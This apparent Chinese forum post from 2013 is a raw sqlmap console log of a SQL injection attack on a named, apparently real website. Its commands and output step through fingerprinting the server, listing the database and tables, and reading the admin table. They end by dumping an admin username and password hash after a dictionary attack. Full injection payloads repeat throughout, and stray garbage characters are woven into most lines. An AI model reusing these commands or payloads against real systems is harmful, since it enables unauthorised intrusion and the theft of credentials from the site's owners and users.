D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db' n+ l' U# c0 K
ms "Mysql" --current-user /* 注解:获取当前用户名称7 O q, m* P0 b" n( i# M0 |
sqlmap/0.9 - automatic SQL injection and database takeover tool7 m, c# X5 g$ N
http://sqlmap.sourceforge.net starting at: 16:53:54, {" P" ^& q* W5 i# V* s. Q3 j
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as( f+ f% l6 Z, \9 U; M9 S, N
session file8 V' ^ R4 ~- { n, y
[16:53:54] [INFO] resuming injection data from session file
$ s, [ @) T/ z[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file; e! h+ ]1 ]5 Z7 c6 B
[16:53:54] [INFO] testing connection to the target url( }$ A* R3 m: @, f1 T7 [/ ?
sqlmap identified the following injection points with a total of 0 HTTP(s) reque I) _, D7 R a" Z
sts:4 }2 n) M( W5 o# |: G
---/ g! @( e2 g, ?! ~! x' ?9 E6 o& w
Place: GET8 O5 f: c9 j% h& H
Parameter: id
+ |- Z( A6 N T0 `* u# U" W* f Type: boolean-based blind
, g/ O7 }" ]. L8 |4 y# }4 T" U Title: AND boolean-based blind - WHERE or HAVING clause
' X. ?+ o1 ~% L Payload: id=276 AND 799=799# f U2 l& h* {% D% g- i1 u8 |
Type: error-based
! o) q) \3 B9 { Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 f7 X! }* Y2 W3 W7 ?# w1 W5 s
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 s) E" P5 b& q/ `+ X1 M
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
8 r: l$ d" N2 z' M! H2 b$ N0 g0 g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)% ~2 m# c! i8 s8 f, X& ^, h6 O: ~
Type: UNION query5 T& o7 j2 b+ u8 a, X+ |
Title: MySQL UNION query (NULL) - 1 to 10 columns
+ ^3 s* Z- g4 u Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ b" W/ d+ `& q- y6 R
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
K7 [5 ]1 V/ h7 Y3 ^CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
& t( R- e* x a Type: AND/OR time-based blind, G1 m U8 J* i3 Z$ ]- `3 G) n
Title: MySQL > 5.0.11 AND time-based blind, |5 b# Y- j( K2 `# K
Payload: id=276 AND SLEEP(5)2 Q8 G; m/ A7 w+ I/ V0 @
---
, g0 \7 j1 i! G- E" W2 N[16:53:55] [INFO] the back-end DBMS is MySQL
& b# O% |3 b* f' Kweb server operating system: Windows) x8 a, a7 }* N( L( q9 `
web application technology: Apache 2.2.11, PHP 5.3.0
" r$ a3 c% l4 Y- q- _2 y# Dback-end DBMS: MySQL 5.04 |( w5 _# \& g* m
[16:53:55] [INFO] fetching current user8 D$ f l# `3 ^
current user: 'root@localhost'
" h0 v, c1 j6 K9 m: H" P[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
; |, _+ p1 n0 Rtput\www.wepost.com.hk' shutting down at: 16:53:58. ?' b- q" F: R4 z5 Q
% q4 y5 p8 ]$ V. K* P* W& PD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: ^2 b6 U& h% `$ ]( u3 Dms "Mysql" --current-db /*当前数据库
' a+ ^5 v0 G0 V1 \. L1 _ sqlmap/0.9 - automatic SQL injection and database takeover tool2 v/ f2 l( ?/ h R4 N
http://sqlmap.sourceforge.net starting at: 16:54:16$ S; v( _; {/ r! j
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
3 t: n7 w# f; d4 } session file
) c' p- U9 s- B% I4 a4 ~4 Z[16:54:16] [INFO] resuming injection data from session file
4 @( R6 s4 _1 B7 V[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file! g! }: ?$ ?$ l( w) u6 R
[16:54:16] [INFO] testing connection to the target url5 X5 p+ B" w+ ]9 s7 p9 X; w2 I
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
@/ Q+ Z" r5 ]* ?, Msts:5 q& U$ ~" a4 X, W, w" e; @; x
---/ F6 L! {3 H3 Q5 x% X
Place: GET
: ?$ K, a( ^: Q/ TParameter: id
. ^$ `" T H4 l! L# I N: E6 B6 p Type: boolean-based blind
2 N3 J9 f0 C+ M! |- g Title: AND boolean-based blind - WHERE or HAVING clause p" i3 E0 J( i9 B1 r/ d/ r( _
Payload: id=276 AND 799=799
' K" K1 [1 m2 J) ]2 D O Type: error-based7 t" d/ |! N' t" |; @" I- t! ?
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( E" ]0 L+ L5 l8 g Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
$ n0 r. R3 ` k9 o( [120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
# T0 j$ g* D7 Z7 F5 u# W),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
) D/ p- v- o' ]. Z6 L Type: UNION query+ c6 g4 B/ {. u' U; J" @
Title: MySQL UNION query (NULL) - 1 to 10 columns% v" J, v1 j* p8 `+ a- M9 Z3 d
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
2 W; m" ~3 ~7 L2 Z/ i(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),; Y2 g: ?4 o6 n$ F: ]3 z) g
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#9 }: U3 K* V7 Z& m
Type: AND/OR time-based blind2 U/ a2 C. k, M4 s0 n
Title: MySQL > 5.0.11 AND time-based blind1 O5 }3 C( E7 z g" e
Payload: id=276 AND SLEEP(5)
7 m+ D% \, L, N# J; u---
3 K9 \% O* C5 i. e6 l2 o& x! ~, b[16:54:17] [INFO] the back-end DBMS is MySQL; @- v. X. f3 g9 ?) _
web server operating system: Windows
( _+ }! K- {2 H' i5 T* @ Dweb application technology: Apache 2.2.11, PHP 5.3.0
- K5 j3 T% J1 w/ b1 Gback-end DBMS: MySQL 5.0
; b( I9 n' w) m[16:54:17] [INFO] fetching current database" C# V" b/ Q/ Y/ M/ Q+ o5 ]+ b4 |
current database: 'wepost'& h# i6 P* T; d4 M
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou+ o: M+ x8 z* t0 Y: l' m( E" ?& \' i
tput\www.wepost.com.hk' shutting down at: 16:54:185 k7 N5 V) _* H Q- T
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
5 w( F& }- n7 Q/ j2 X2 F U* l4 hms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
6 R4 v/ U0 o! g U6 \- w: X sqlmap/0.9 - automatic SQL injection and database takeover tool
0 K) Q. O- j# F: F; | http://sqlmap.sourceforge.net starting at: 16:55:25
% ~6 l- @' E7 `7 a[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
% Z2 V) E& x( d( U/ e) l session file; h% y8 N) V% c
[16:55:25] [INFO] resuming injection data from session file5 X4 f5 k9 N+ z/ o
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
( {2 _1 ?& e% r# G6 h[16:55:25] [INFO] testing connection to the target url1 I& D! K6 h* W
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
) B& r; P% a5 X1 R5 `$ s- |sts:
2 i2 ]+ r% e6 v+ Z9 w" e: m1 B---
7 Z6 P" [- u+ D5 c$ H1 RPlace: GET4 e& r, j8 l, V' v3 l" |, p
Parameter: id
% U% u' l/ b3 E& Q1 N Type: boolean-based blind( M( G5 R4 Y ~) T4 K4 K
Title: AND boolean-based blind - WHERE or HAVING clause
$ C3 S9 ]# @; ?" e4 B/ q$ m Payload: id=276 AND 799=799
! W) W& O8 l! L Type: error-based9 C8 L/ _* O g$ l) E$ j2 ^
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
) ^3 c' t* Z! y( {7 b5 N Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
: K0 W' Q: u( O) I120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
) i8 Q3 R% V# B; s, [* ]) ^. ~),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)4 I& I, f& a4 _1 x2 ^ H9 C# @
Type: UNION query
* P6 T( u1 f' S3 `% D% Q Title: MySQL UNION query (NULL) - 1 to 10 columns
5 F8 W$ N; u2 N Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR' K; z3 p& F" e5 v4 I4 l
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),5 l& ^5 Y: n# s. u2 t7 X3 G
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#% M2 i3 h5 _% N
Type: AND/OR time-based blind! J) y; e, I" }& N& {3 @) b$ x! k
Title: MySQL > 5.0.11 AND time-based blind2 B# q8 P' |7 w
Payload: id=276 AND SLEEP(5)3 m- m6 V: Q# O- m6 T
---: k% g) o- M0 h/ J# J$ Q5 Y9 F
[16:55:26] [INFO] the back-end DBMS is MySQL
4 t U2 y q/ m. Q# {( zweb server operating system: Windows
5 m% j+ n* \& l8 c$ pweb application technology: Apache 2.2.11, PHP 5.3.0( f/ D* c+ g p# m
back-end DBMS: MySQL 5.05 z K# {* y: N
[16:55:26] [INFO] fetching tables for database 'wepost'0 S1 {' }5 S: h/ O( G7 r2 `
[16:55:27] [INFO] the SQL query used returns 6 entries- |3 P- V. k! b% Q4 b
Database: wepost
# `7 B. s$ `/ C/ M1 t8 V2 G[6 tables]
8 M$ F T! F5 n# j' D+-------------+5 _ s$ E2 y6 b+ D
| admin |0 W1 D! n1 g/ }& ^
| article |; F- l) {* f! }; y* t5 D; s! d
| contributor |. ]8 W6 U* u& X5 W0 l7 z
| idea |6 m5 Q& P* a' R7 f
| image |
& q; L7 Z0 l7 ]| issue |
* G; v5 \& Y J+-------------+
' ^ E! z) M: R8 G) Q1 C- o[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou' e, P: n( B. \
tput\www.wepost.com.hk' shutting down at: 16:55:33
4 h. {3 v: c+ O7 u7 l9 \8 l
* P+ v; S+ C1 [" mD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db' K( T! X2 R" ]: }9 y$ J+ |! f, R1 W
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名) x# ]- ]/ n, [0 \: _
sqlmap/0.9 - automatic SQL injection and database takeover tool; e, o3 a5 X" |4 Y2 p. j/ L9 l
http://sqlmap.sourceforge.net starting at: 16:56:06
. X5 `. m# A- d+ isqlmap identified the following injection points with a total of 0 HTTP(s) reque$ ~9 Z% l4 ^' j' X2 ?2 T
sts:0 t% p9 P6 x4 @+ z4 @/ |
---
, f5 o1 p, f f1 A3 o S. m2 U8 ZPlace: GET$ N/ s0 u) K$ G$ j3 J
Parameter: id
& C. c( d0 j' s Type: boolean-based blind1 X* l! Y6 _4 s; }
Title: AND boolean-based blind - WHERE or HAVING clause
5 }! M9 T0 c5 j3 s& T, a Payload: id=276 AND 799=799- ]! w. x2 A+ n: S. R
Type: error-based
7 L5 S2 M; W2 |1 b* z: | Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
, @+ N+ e& F- _ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
$ s5 B' T: W* j1 A120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
! L- d/ r6 O& B. `/ C, A),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
o8 y! t% s) I) B' H8 [- s Type: UNION query
% }2 H; |9 V+ P Title: MySQL UNION query (NULL) - 1 to 10 columns2 z8 R. t( J& J& e
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
- l5 X1 U0 t- I2 W(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
$ t4 `; c- d- m5 JCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#0 ]9 ^5 q$ y% g2 l: H+ b, n( j
Type: AND/OR time-based blind* q( I1 W% k, z/ Q: \) B, b
Title: MySQL > 5.0.11 AND time-based blind
5 l0 s/ h/ _" M* J {/ P Payload: id=276 AND SLEEP(5)# X1 @3 V, M& C- X/ n! k- u: Q! ^! K
---
0 q4 I, `, x) q$ E6 y; b1 kweb server operating system: Windows
; G f& J# x% u4 sweb application technology: Apache 2.2.11, PHP 5.3.0
$ R! |5 }! ~8 q, W. T: Q( Tback-end DBMS: MySQL 5.08 l& c1 R' ]' Y3 B8 [9 _
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se" o/ B$ n, \$ K4 C% g' i
ssion': wepost, wepost
/ u# h* Z/ } ZDatabase: wepost
+ m5 l! W5 K( d. wTable: admin. o7 ~- |5 ~2 n; T/ ]
[4 columns]3 N& Z+ Q+ F+ h# Z
+----------+-------------+* L: M( ^4 ]$ H: L. v
| Column | Type |: K8 o9 u8 \- U7 p
+----------+-------------+
8 {# o/ T' u# a3 I! k| id | int(11) |2 B; p$ x( u* L( W
| password | varchar(32) |# I4 q( \9 C' {3 Y5 @
| type | varchar(10) |) L4 \8 e T5 C# L/ s" j
| userid | varchar(20) |" _8 Q2 B$ q6 \# g: ?! B, { z
+----------+-------------+
$ N7 T9 Q& ~# q( B4 E shutting down at: 16:56:19( H0 j5 X) Q6 v+ l' U
" Z+ C2 k+ j; ]( |6 \ K( \D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
- t7 ]# _; I% y" f' Pms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
' l# R5 f4 G6 ~& u# h# I& b sqlmap/0.9 - automatic SQL injection and database takeover tool& j- H" _( Y, R
http://sqlmap.sourceforge.net starting at: 16:57:14) c4 x8 `- Z( g. T x' H
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 [' D) r8 j3 L; T8 i0 D( fsts:0 W. M& _% B. w* p7 Z6 R& u! {
---
6 n" ~9 O {- B" ~5 `, C0 oPlace: GET
2 N# K' H8 j4 ]6 d# EParameter: id
% u+ P( l7 J- U Type: boolean-based blind
% `$ a& W4 |4 [: S' h$ z Title: AND boolean-based blind - WHERE or HAVING clause& L' r0 B! H9 c( G7 p
Payload: id=276 AND 799=799' Y+ @: a) M4 ~5 }4 s1 b
Type: error-based# y/ t6 G5 W! d- E/ x6 D
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 h2 s* x4 s& ^- m8 a Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 l% ~0 O- `/ E' z$ Y
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
. j7 ~# e m2 N),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
1 Z' f) r$ `: H* p) r8 t6 u Type: UNION query1 E& N; A9 A4 U0 H: Z9 ]: b- L! |
Title: MySQL UNION query (NULL) - 1 to 10 columns
. \2 O2 b9 Y6 p: D, s/ o Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( i) E" G% q0 I5 J( P* W' G* l3 V: [
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
0 @; {6 |) e$ Y$ ]/ G( GCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
8 C& L7 g( g) @ Type: AND/OR time-based blind
( g' r: D- G/ G+ |2 z Title: MySQL > 5.0.11 AND time-based blind
9 Z, z D6 d% n Payload: id=276 AND SLEEP(5)+ i+ S: U% I0 X1 M9 l* B: h+ s
---
. t# Y9 b8 v! ], Yweb server operating system: Windows% }: M6 K5 i& v. x* }6 S
web application technology: Apache 2.2.11, PHP 5.3.0
4 I) m. V5 b/ Hback-end DBMS: MySQL 5.0) j. G7 `) A5 }9 D c; j$ {5 w4 |- M
recognized possible password hash values. do you want to use dictionary attack o
7 ]) M% y* k( u# Z* c$ O; ?n retrieved table items? [Y/n/q] y: D7 C G! z# z
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]3 V! r) p6 i& E: h1 J5 ^
do you want to use common password suffixes? (slow!) [y/N] y
- S1 `/ |' R8 f0 L8 [2 J: c5 r1 @Database: wepost4 n1 F' W: U/ K$ k
Table: admin7 z& W' l9 t/ @% i/ i* j
[1 entry]
. P8 X9 n6 {6 }+----------------------------------+------------+
! W, \! _& v3 f2 }( Y% O- ~| password | userid |) K! Q/ ]' u Y
+----------------------------------+------------+$ R- W! W% t/ p# ?. }
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |# @! [; ?9 y2 X
+----------------------------------+------------+! Z& m- e/ [4 m$ M7 l2 ^) M& e9 @
shutting down at: 16:58:140 D) c: Z; o' \
5 {; L& L+ J; I; W1 F( y, W' UD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对